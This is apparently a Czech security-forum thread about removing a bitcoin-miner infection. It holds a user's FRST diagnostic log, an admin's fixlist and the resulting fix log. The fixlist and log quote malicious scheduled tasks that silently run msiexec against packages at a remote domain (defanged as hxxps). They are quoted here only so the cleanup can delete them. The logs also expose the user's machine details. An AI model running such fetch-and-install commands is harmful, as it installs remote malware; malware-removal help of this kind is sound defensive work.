FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1A893123-B4BA-456F-A0C7-41F838DC949F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{8DB1E1F0-16A6-4606-9005-2050E5C78DE7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{94EB72EF-A6B6-40A4-B5C2-6012F19A2856}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C58183BB-F885-413A-8CCD-F9C3CCA34618}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{4D6DA014-7F0C-4B62-961A-70A13657F889}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{04F8F7EA-9E8D-4B8A-AA7C-E1546EBC72BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D2FA1B8F-C328-4C2E-AA5B-FB60C501ECC0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{10D54F44-89D5-4BBE-9707-0159D50EF144}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8B080234-427A-4E7E-BDED-E4853E19C777}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C6A43CF8-A945-4350-ADBF-68B3F3A1E9D5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{D96CE39B-1EC5-47C4-B76F-591963112C3F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2559EE57-6464-4F43-9CA4-3245EA7A496F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1B2A11D6-89E4-4D54-8C29-31E8F4DA6D77}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{674586D3-506E-4FDD-A8AE-D3FAF3B0DA7A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CD11B4D0-772F-453F-A1F0-BC0E1CF510E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{13D2236C-FE05-4D62-9CFA-6200735089C2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{FD2FA0E1-2074-415C-9F02-10C196F2C6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8847043E-064A-490F-804D-68759745A67C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8061FEA0-EF8E-4BF6-B1BB-808DED40D163}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{93678E0E-C66D-43DA-868A-F9E2058773BD}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{59C93D05-4690-44B4-9389-0F118AD02F38}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2019 08:07:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:03 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:02 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:01 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:00 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:59 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:58 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:57 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.


System errors:
=============
Error: (01/12/2019 12:05:07 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby EventSystem s argumenty Není k dispozici za účelem spuštění serveru:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (01/12/2019 12:04:21 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:24 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:09 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B68-F52A-11D8-B9A5-505054503030}

Error: (01/12/2019 12:02:11 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:01:05 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby TokenBroker s argumenty Není k dispozici za účelem spuštění serveru:
Windows.Internal.Security.Authentication.Web.TokenBrokerInternal

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby netprofm s argumenty Není k dispozici za účelem spuštění serveru:
{A47979D2-C419-11D9-A5B4-001185AD2B89}


Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin

Date: 2019-01-10 19:36:54.115
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:23:18.123
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:01:02.490
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 17:30:21.507
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2

Date: 2019-01-11 23:59:21.017
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 20:05:50.438
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 13:46:01.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2019-01-11 19:33:13.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:23:44.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:02:52.546
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:50:49.237
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:35:34.802
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:28:40.259
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 17:56:09.418
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:33:10.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 16%
Total physical RAM: 6035.48 MB
Available physical RAM: 5059.46 MB
Total Virtual: 6995.48 MB
Available Virtual: 6223.95 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:902.98 GB) (Free:593.08 GB) NTFS

\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)

Partition: GPT.

==================== End of Addition.txt ============================


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 11:26 
Offline
Site Admin
Site Admin
Uživatelský avatar

Registrován: 30 říj 2003 13:42
Příspěvky: 107885
Bydliště: Plzeň
Otevřte poznámkový blok a zkopírujte do něj:

Citace:
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End


Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

_________________
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 11:43 
Offline
Návštěvník
Návštěvník

Registrován: 10 úno 2012 14:30
Příspěvky: 8
Fix result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 11:27:39) Run:1
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4fc3e674-a3f9-11e8-b924-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{4fc3e674-a3f9-11e8-b924-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec38e4-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec38e4-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec39f6-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec39f6-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{df1b3e25-3b2c-11e8-b912-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{df1b3e25-3b2c-11e8-b912-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f6086f2d-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f6086f2d-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f608762c-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f608762c-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKLM\System\CurrentControlSet\Services\bddci" => removed successfully
bddci => service removed successfully
C:\WINDOWS\System32\Tasks\kuaejfar => moved successfully
C:\WINDOWS\System32\Tasks\gcknyzn => moved successfully
C:\Users\ulol\rstr2.ini => moved successfully
C:\ProgramData\ts.dat => moved successfully
C:\ProgramData\lock.dat => moved successfully
C:\ProgramData\irw.atsd => moved successfully
